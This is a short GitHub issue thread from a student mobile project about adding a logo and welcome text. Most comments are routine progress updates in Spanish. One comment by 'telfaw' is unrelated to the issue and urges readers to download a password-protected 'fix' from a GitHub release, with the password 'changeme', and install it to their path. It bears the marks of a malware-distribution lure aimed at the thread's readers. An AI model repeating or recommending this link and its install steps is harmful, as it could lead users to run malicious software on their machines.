### ISSUE TITLE
#US01#TK01 - Añadir logo y texto de bienvenida

### ISSUE THREAD

**Issue by Alcario** [Proyecto-integrador-ISPC-2024/proyecto-integrador-mobile-2024#9]
#8

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Js-Alvarez** [comment]
Se comenzo el codigo para el proyecto con dificultades para cambiar el colo de fondo de los botones

**Comment by Js-Alvarez** [comment]
Añadir logo y texto de bienvenida terminado, se esta buscando alguna animación para mejorar la experiencia del usuario
